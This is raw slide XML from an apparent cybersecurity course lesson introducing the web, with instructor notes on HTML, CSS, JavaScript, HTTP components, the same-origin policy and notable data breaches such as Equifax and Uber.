                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> to leak this information, as attackers can use it to detect vulnerabilities about the server.</a:t>
            </a:r>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ff33a2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ff33a2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569ec14bf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569ec14bf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569ec14bf4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69ec14bf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569ec14bf4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569ec14bf4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569ec14bf4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569ec14bf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6" name="Shape 1266"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1267" name="Google Shape;1267;g569ec14bf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569ec14bf4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569ec14bf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69ec14bf4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8" name="Shape 1278"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1279" name="Google Shape;1279;g569ec14bf4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569ec14bf4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569ec14bf4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569ec14bf4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Explain that HTML is a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>markup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, meaning that browsers interpret it in such a way that allows us to describe what content a web documents will contain, and where on the page it will live.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Point out that web pages contain text, such as the strings reading “Hi!” and “Feel free to hack your way in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>” in the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Rendered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> image on the right.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Emphasize that HTML is </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> text, but the special formatting characters used to write it—in particular, the angle brackets visible in the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Raw HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> image on the left—cause the browser to interpret it differently than “normal” text, and display it according to special rendering rules.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the fact that, while it may seem obvious that browsers treat HTML differently from “normal” text, this is the source of major vulnerabilities, such as XSS, which we’ll study later.</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Low Risk Image. Website: Hack the Box</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69ec14bf4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69ec14bf4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-Remind students that CSS describes the appearance of a page.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-Explain that the left image depicts a page with CSS styles. The image on the right depicts the same page with styles removed.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-Explain that the font settings, background, and even the illusion of tilt in the left image are all due to CSS.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Explain that the default rules browsers use to render raw HTML don't result in pretty pages.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To demonstrate, open [Ins_Raw_HTML/index.html](Activities/Ins_Raw_HTML/index.html) in the browser.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 Point out that some things have been "rendered", e.g., the large headings, but that the page doesn't look like those we're used to seeing.</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569ec14bf4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569ec14bf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569ec14bf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569ec14bf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569ec14bf4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569ec14bf4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69ec14bf4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69ec14bf4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569ec14bf4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69ec14bf4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58b773f71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58b773f71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g58b773f71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58b773f71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Google Shape;1390;g58b773f71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58b773f71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Reassure students that they don’t need to understand this code snippet—this is simply for exposure to what JS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>looks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> like. The main takeaways are that JavaScript can be used for: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Adding interactivity to web pages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 Send data to/from the network from the browser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 Facilitating data transfers between clients/servers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58b773f71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58b773f71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58b773f71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8b773f71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5" name="Shape 1415"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1416" name="Google Shape;1416;g58b773f71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58b773f71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Google Shape;1423;g58b773f71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58b773f71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69ec14bf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69ec14bf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58b773f71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58b773f71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Google Shape;1435;g58b773f71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58b773f71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58b773f71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58b773f71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58b773f71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58b773f71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Explain that this table indicates whether each of the URLs in the table has the same origin as the “base URL” in the heading, which is: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://store.company.com/dir/page.html</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Point out that the base URL has the following properties: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Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: http</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Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: store.company.com</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t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: 80 (default for HTTP)</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Point out that, in the first two rows, both URLs have the same protocol, domain, and port as the base URL. The path to the requested file is different, but this is allowed by the same origin policy.</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Point out that, in the others, one of the other pieces of information is different, which violates the same origin policy.</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This means that a user who loads </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>http://store.company.com/dir/page.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> request resources from the first two URLs—</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> the last ones.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8b773f71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8b773f71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58b773f71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58b773f71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58b773f71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58b773f71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g58b773f71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58b773f71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58b773f71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58b773f71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Google Shape;1497;g58b773f716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58b773f716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5124b40e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5124b40e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another characteristic of the web that makes it “special” is the fact that it accounts for a considerable proportion of the modern threat landscape.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58b773f71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58b773f71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58b773f71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58b773f71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58b773f71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58b773f71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569ec14bf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569ec14bf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Quote attributed to Scott Vernick: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.thestreet.com/story/14431727/1/uber-s-rough-road-leads-to-softbank-deal.html</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Finally, emphasize that the stakes of failing to protect this data are high.</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this chart includes statistics detailing the impact of major breaches against the networks of large organizations (the “M” in the right column stands for “millions”).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Not all of these breaches were due to exploitation of web servers, but many were: Equifax was due to an Apache Struts vulnerability; Heartland Payment Systems was due to a SQL Injection vulnerability; and Uber was due to exposed AWS credentials being stored on an internally maintained GitHub account.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With compromised user accounts and leaked credit card numbers totaling in the hundreds of millions, and the monetary cost of breaches on occasion exceeding hundreds of millions (Yahoo!), or even billions (Uber, partially attributable to their handling of the breach), it’s clear that the web is one of the most important of an organization’s exposed surfaces to secure.</a:t>
            </a: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569ec14bf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569ec14b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569ec14bf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569ec14bf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569ec14bf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69ec14bf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4.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3.png"/><Relationship Id="rId4"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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.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4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5.png"/><Relationship Id="rId4"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55.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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62.png"/><Relationship Id="rId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56.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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57.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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79.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.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7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7.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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86.png"/><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9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93.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.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88.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image106.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.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0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0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0.png"/><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0.png"/><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www.target.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.target.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.target.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www.target.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.target.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.target.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www.target.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.target.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.target.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0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02.pn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01.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http://example.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/*" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.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hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_polic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5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Web Development Day 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1024" name="Google Shape;1024;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="1440025"/>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1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Introduction to the Modern Web</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1025" name="Google Shape;1025;p5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HTTP Communication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1109" name="Google Shape;1109;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Web is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>similar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to other networks we’ve covered in the past, except that it leverages the HTTPS over TCP/IP, rather than other protocols such as FTP. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1110" name="Google Shape;1110;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11" name="Google Shape;1111;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6899450" y="2181425"/>
            <a:ext cx="1567475" cy="1301826"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1112" name="Google Shape;1112;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="702213" y="2181428"/>
            <a:ext cx="1567482" cy="1301812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1113" name="Google Shape;1113;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3855913" y="2014815"/>
            <a:ext cx="1457325" cy="1635047"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1114" name="Google Shape;1114;p62"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1112" idx="3"/>
            <a:endCxn id="1113" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2269694" y="2832333"/>
            <a:ext cx="1586100" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="triangle"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1115" name="Google Shape;1115;p62"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1113" idx="3"/>
            <a:endCxn id="1111" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5313237" y="2832339"/>
            <a:ext cx="1586100" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="triangl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Major Players</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1121" name="Google Shape;1121;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Key Devices that support the Internet: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1122" name="Google Shape;1122;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3" name="Google Shape;1123;p6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Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Clients</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> are devices that initiate HTTP requests</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1124" name="Google Shape;1124;p6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Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Routers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> determine how to get traffic from a client to server</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1125" name="Google Shape;1125;p6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Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> are devices that fulfill requests and provide responses to requests</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126" name="Google Shape;1126;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-75" y="3919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Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Proxy Servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> sit in between clients and destination servers.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Web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Google Shape;1132;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Web also handles more user data than any other network</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1133" name="Google Shape;1133;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4" name="Google Shape;1134;p6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ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Comfortaa"/>
                <a:ea typeface="Comfortaa"/>
                <a:cs typeface="Comfortaa"/>
                <a:sym typeface="Comfortaa"/>
              </a:rPr>
              <a:t>Twitter</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3200">
                <a:latin typeface="Comfortaa"/>
                <a:ea typeface="Comfortaa"/>
                <a:cs typeface="Comfortaa"/>
                <a:sym typeface="Comfortaa"/>
              </a:rPr>
              <a:t>: 6,000 Tweets</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:latin typeface="Comfortaa"/>
              <a:ea typeface="Comfortaa"/>
              <a:cs typeface="Comfortaa"/>
              <a:sym typeface="Comfortaa"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
                <a:cs typeface="Montserrat Medium"/>
                <a:sym typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
                <a:cs typeface="Montserrat Medium"/>
                <a:sym typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
                <a:cs typeface="Montserrat Medium"/>
                <a:sym typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
                <a:cs typeface="Montserrat Medium"/>
                <a:sym typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
                <a:cs typeface="Montserrat Medium"/>
                <a:sym typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
                <a:cs typeface="Montserrat Medium"/>
                <a:sym typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
                <a:cs typeface="Montserrat Medium"/>
                <a:sym typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>: 40,000 queries </a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Montserrat Medium"/>
              <a:ea typeface="Montserrat Medium"/>
              <a:cs typeface="Montserrat Medium"/>
              <a:sym typeface="Montserrat Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
